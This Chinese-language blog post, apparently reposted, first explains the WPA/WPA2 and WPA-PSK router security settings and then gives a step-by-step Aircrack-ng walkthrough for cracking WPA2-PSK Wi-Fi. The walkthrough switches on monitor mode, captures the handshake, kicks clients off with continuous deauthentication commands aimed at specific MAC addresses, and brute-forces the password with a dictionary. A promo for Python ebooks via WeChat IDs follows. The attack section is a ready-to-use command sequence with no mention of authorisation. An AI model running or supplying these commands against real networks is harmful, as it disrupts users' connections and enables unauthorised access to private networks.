WPA/WPA2:
WPA/WPA2是一種比WEP強壯的加密演算法,挑選這種安全型別,路由器將選用Radius服務器進行身份認證并得到密鑰的WPA或WPA2安全形式,因為要架起一臺專用的認證服務器,價值對比貴重且保護也很雜亂,所以不推薦不同用戶運用此安全型別,
WPA-PSK/WPA2-PSK:
WPA-PSK/WPA2-PSK安全型別其實是WPA/WPA2的一種簡化版本,它是依據同享密鑰的WPA形式,安全性很高,設定也相對簡單,適合不同家庭用戶和小型企業運用,其詳細設定:
認證型別:該項用來挑選體系選用的安全形式,即主動、WPA-PSK、WPA2-PSK,
主動:若挑選該項,路由器會依據主機懇求主動挑選WPA-PSK或WPA-PSK的安全形式,
加密演算法:該項用來挑選對無線資料進行加密的安全演算法,選項有主動、TKIP、AES,默許選項為主動,挑選該項后,路由器將依據實踐需求主動挑選TKIP或AES加密辦法,留意11N形式不支持TKIP演算法,
PSK暗碼:該項就是WPA-PSK/WPA2-PSK的初始密鑰了,在設定是,需求為8-63個ASCII字符或者8-64個十六進制的字符,
組密鑰更新周期:該項設定播送和組博密鑰的定時更新,以秒為單位,最小值為30,若該值為0,問表示不進行更新,
使用Aircrack-ng抓取WPA2-PSK握手包
主要步驟:
1.設定無線網卡至監聽模式 airmon-ng start wlan0
2.掃描周圍WPA2-PSK加密的無線信號 airodump-ng wlan0mon
3.新建一個終端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon 需指定信道
4.等待程序中,發起DeAuth攻擊,強制將客戶端踢下線重連,抓取握手包:aireplay-ng -0 5 -a BSSID -c STATION wlan0mon設定為發起5次攻擊
如果想要不停的發起攻擊就是這樣aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
開始操作
我使用的網卡是TL-WN722N
此時需要讓虛擬機連接網卡
連接成功后,輸入ifconfig會看到
然后輸入airmon-ng start wlan0
成功后
開始監聽(掃描周圍的無線信號)
途中CN為信道
airodump-ng -c 信道 --bssid xxx -w 保存路徑 wlan0mon
抓取目標的握手包
引數:—ivs -w FAN 保存ivs格式的包,名字為test —bssid 要破解ap的ssid
強制將客戶端踢下線aireplay-ng -0 0 -a 目標的MAC地址 -c 目標客戶端MAC wlan0mon
aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon
開始進行攻擊,但是有時候該命令會報錯,這是因為網卡會隨機使用信道,信道不同,多嘗試幾次同樣的命令直到成功就行了
如圖所示就證明抓到了握手包
最后用好的字典爆破
開始破解密碼,執行如下的命令,成功后就可以看到已經破解出的密碼,如果密碼復雜一點,可能需要時間
aircrack-ng -w 字典 保存的包
aircrack-ng -w 后面都是絕對路徑
說實在的,每次在后臺看到一些讀者的回應都覺得很欣慰,我想把我收藏的一些編程干貨貢獻給大家,回饋每一個讀者,希望能幫到你們,
干貨主要有:
① 2000多本Python電子書(主流和經典的書籍應該都有了)
② Python標準庫資料(最全中文版)
③ 專案原始碼(四五十個有趣且經典的練手專案及原始碼)
④ Python基礎入門、爬蟲、web開發、大資料分析方面的視頻(適合小白學習)
⑤ Python所有知識點匯總(可以弄清楚Python的所有方向和技術)
如果你用得到的話可以直接拿走,有需要的朋友可以添加我的微信:difan159 或者yanle7758258 獲取!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/294130.html
標籤:其他